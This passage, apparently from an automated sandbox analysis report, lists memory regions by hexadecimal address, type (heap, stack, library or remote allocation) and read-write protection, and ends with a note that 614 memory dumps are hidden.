page read and write
|
||
|
244ECE40000
|
trusted library allocation
|
page read and write
|
||
|
287041D6000
|
heap
|
page read and write
|
||
|
29E7AE02000
|
heap
|
page read and write
|
||
|
1E266400000
|
heap
|
page read and write
|
||
|
FDB99FA000
|
stack
|
page read and write
|
||
|
1F20F868000
|
heap
|
page read and write
|
||
|
29EE0A20000
|
heap
|
page read and write
|
||
|
3612DFF000
|
stack
|
page read and write
|
||
|
4B433FB000
|
stack
|
page read and write
|
||
|
1F20F6C0000
|
heap
|
page read and write
|
||
|
22816213000
|
heap
|
page read and write
|
||
|
1DBE7585000
|
heap
|
page read and write
|
||
|
D736F79000
|
stack
|
page read and write
|
||
|
1E26646D000
|
heap
|
page read and write
|
||
|
26451C3C000
|
heap
|
page read and write
|
||
|
1C6EB290000
|
heap
|
page read and write
|
||
|
1F20F85D000
|
heap
|
page read and write
|
||
|
29EE0C00000
|
heap
|
page read and write
|
||
|
1DBE7A02000
|
heap
|
page read and write
|
||
|
854D5AA000
|
stack
|
page read and write
|
||
|
29E7A6A1000
|
heap
|
page read and write
|
||
|
1C6EB0B0000
|
heap
|
page read and write
|
||
|
26451C59000
|
heap
|
page read and write
|
||
|
29E7AFDD000
|
heap
|
page read and write
|
||
|
29E7A702000
|
heap
|
page read and write
|
||
|
611D4FF000
|
stack
|
page read and write
|
||
|
1C6EB308000
|
heap
|
page read and write
|
||
|
1DBE7572000
|
heap
|
page read and write
|
||
|
1DBE75D7000
|
heap
|
page read and write
|
||
|
22816241000
|
heap
|
page read and write
|
||
|
1DBE75AB000
|
heap
|
page read and write
|
||
|
1F20F893000
|
heap
|
page read and write
|
||
|
1DBE75A7000
|
heap
|
page read and write
|
||
|
29E7FED9000
|
heap
|
page read and write
|
||
|
29E7FF02000
|
heap
|
page read and write
|
||
|
29E7FDA0000
|
trusted library allocation
|
page read and write
|
||
|
678D57C000
|
stack
|
page read and write
|
||
|
29E7AF18000
|
heap
|
page read and write
|
||
|
22CF7002000
|
heap
|
page read and write
|
||
|
26451C9B000
|
heap
|
page read and write
|
||
|
D12307B000
|
stack
|
page read and write
|
||
|
D122F7B000
|
stack
|
page read and write
|
||
|
1DBE7A19000
|
heap
|
page read and write
|
||
|
1C6EB287000
|
heap
|
page read and write
|
||
|
26451C5A000
|
heap
|
page read and write
|
||
|
1DBE6CE9000
|
heap
|
page read and write
|
||
|
1DBE7588000
|
heap
|
page read and write
|
||
|
411FDFE000
|
stack
|
page read and write
|
||
|
611D5FE000
|
stack
|
page read and write
|
||
|
29E7FF17000
|
heap
|
page read and write
|
||
|
1F0DD702000
|
heap
|
page read and write
|
||
|
678CD7C000
|
stack
|
page read and write
|
||
|
22816190000
|
heap
|
page read and write
|
||
|
5F2447B000
|
stack
|
page read and write
|
||
|
D73757F000
|
stack
|
page read and write
|
||
|
1C6EB25A000
|
heap
|
page read and write
|
||
|
29E7FE61000
|
heap
|
page read and write
|
||
|
244EC5A5000
|
heap
|
page read and write
|
||
|
29E7AF59000
|
heap
|
page read and write
|
||
|
1FB3C8A7000
|
heap
|
page read and write
|
||
|
1E2662F0000
|
heap
|
page read and write
|
||
|
22CF7029000
|
heap
|
page read and write
|
||
|
1FB3C8A6000
|
heap
|
page read and write
|
||
|
D12317C000
|
stack
|
page read and write
|
||
|
29E00160000
|
trusted library allocation
|
page read and write
|
||
|
22816274000
|
heap
|
page read and write
|
||
|
1DBE75B3000
|
heap
|
page read and write
|
||
|
287041B2000
|
heap
|
page read and write
|
||
|
1DBE6CA5000
|
heap
|
page read and write
|
||
|
29E7FC84000
|
trusted library allocation
|
page read and write
|
||
|
1F0DD613000
|
heap
|
page read and write
|
||
|
26451C64000
|
heap
|
page read and write
|
||
|
1DBE75AB000
|
heap
|
page read and write
|
||
|
22CF6F30000
|
heap
|
page read and write
|
||
|
1F20F89F000
|
heap
|
page read and write
|
||
|
1DBE7270000
|
remote allocation
|
page read and write
|
||
|
1FB3C820000
|
heap
|
page read and write
|
||
|
26451C00000
|
heap
|
page read and write
|
||
|
244EC276000
|
heap
|
page read and write
|
||
|
1DBE7597000
|
heap
|
page read and write
|
||
|
29E7B180000
|
trusted library allocation
|
page read and write
|
||
|
29E7AFDB000
|
heap
|
page read and write
|
||
|
29E7FF08000
|
heap
|
page read and write
|
||
|
1FB3CBA5000
|
heap
|
page read and write
|
||
|
29EE0C84000
|
heap
|
page read and write
|
||
|
29EE0C58000
|
heap
|
page read and write
|
||
|
1DBE758D000
|
heap
|
page read and write
|
||
|
854DAFC000
|
stack
|
page read and write
|
||
|
1FB3C876000
|
heap
|
page read and write
|
||
|
1F0DD679000
|
heap
|
page read and write
|
||
|
29E7FEFC000
|
heap
|
page read and write
|
||
|
1F0DD600000
|
heap
|
page read and write
|
||
|
1DBE7588000
|
heap
|
page read and write
|
||
|
C48CD7E000
|
stack
|
page read and write
|
||
|
29E7FEFC000
|
heap
|
page read and write
|
||
|
22CF6ED0000
|
heap
|
page read and write
|
||
|
29E7FF06000
|
heap
|
page read and write
|
||
|
29E7A67A000
|
heap
|
page read and write
|
||
|
1C6EB1B0000
|
trusted library allocation
|
page read and write
|
||
|
29E7FE73000
|
heap
|
page read and write
|
||
|
1DBE759B000
|
heap
|
page read and write
|
||
|
29E7FC41000
|
trusted library allocation
|
page read and write
|
||
|
22CF6F90000
|
remote allocation
|
page read and write
|
||
|
29EE0C29000
|
heap
|
page read and write
|
||
|
29E7AF9A000
|
heap
|
page read and write
|
||
|
29E7FE4F000
|
heap
|
page read and write
|
||
|
29E00100000
|
trusted library allocation
|
page read and write
|
||
|
29EE0C6A000
|
heap
|
page read and write
|
||
|
1DBE75A8000
|
heap
|
page read and write
|
||
|
1DBE7594000
|
heap
|
page read and write
|
||
|
29E7AF59000
|
heap
|
page read and write
|
||
|
C834F4E000
|
stack
|
page read and write
|
||
|
244ED110000
|
trusted library allocation
|
page read and write
|
||
|
1F20F882000
|
heap
|
page read and write
|
||
|
D73737F000
|
stack
|
page read and write
|
||
|
1DBE7585000
|
heap
|
page read and write
|
||
|
3612BFF000
|
stack
|
page read and write
|
||
|
29EE0C5E000
|
heap
|
page read and write
|
||
|
FDB95F7000
|
stack
|
page read and write
|
||
|
244ECDE0000
|
trusted library allocation
|
page read and write
|
||
|
287043D4000
|
heap
|
page read and write
|
||
|
28705F90000
|
heap
|
page read and write
|
||
|
1DBE758D000
|
heap
|
page read and write
|
||
|
29E7FC45000
|
trusted library allocation
|
page read and write
|
||
|
29E7A694000
|
heap
|
page read and write
|
||
|
287041C6000
|
heap
|
page read and write
|
||
|
28703FA0000
|
heap
|
page read and write
|
||
|
244ECE50000
|
trusted library allocation
|
page read and write
|
||
|
1F0DDE02000
|
trusted library allocation
|
page read and write
|
||
|
1F0DD664000
|
heap
|
page read and write
|
||
|
1FB3C891000
|
heap
|
page read and write
|
||
|
1C6EB263000
|
heap
|
page read and write
|
||
|
678D27B000
|
stack
|
page read and write
|
||
|
244EC230000
|
heap
|
page read and write
|
||
|
1F20F660000
|
heap
|
page read and write
|
||
|
411FB7F000
|
stack
|
page read and write
|
||
|
1DBE75C1000
|
heap
|
page read and write
|
||
|
1DBE7589000
|
heap
|
page read and write
|
||
|
22CF6F60000
|
trusted library allocation
|
page read and write
|
||
|
29E7FF08000
|
heap
|
page read and write
|
||
|
26451C62000
|
heap
|
page read and write
|
||
|
1F20F89F000
|
heap
|
page read and write
|
||
|
1DBE759E000
|
heap
|
page read and write
|
||
|
D122B6B000
|
stack
|
page read and write
|
||
|
FDB9E7F000
|
stack
|
page read and write
|
||
|
29EE0A30000
|
heap
|
page read and write
|
||
|
287041B7000
|
heap
|
page read and write
|
||
|
22CF6F90000
|
remote allocation
|
page read and write
|
||
|
29E7FC4C000
|
trusted library allocation
|
page read and write
|
||
|
29E7AF58000
|
heap
|
page read and write
|
||
|
22816130000
|
heap
|
page read and write
|
||
|
26451D02000
|
heap
|
page read and write
|
||
|
1E2664B9000
|
heap
|
page read and write
|
||
|
C48CF7E000
|
stack
|
page read and write
|
||
|
26451C54000
|
heap
|
page read and write
|
||
|
1F20F650000
|
heap
|
page read and write
|
||
|
FDB9AFB000
|
stack
|
page read and write
|
There are 614 hidden memdumps, click here to show them.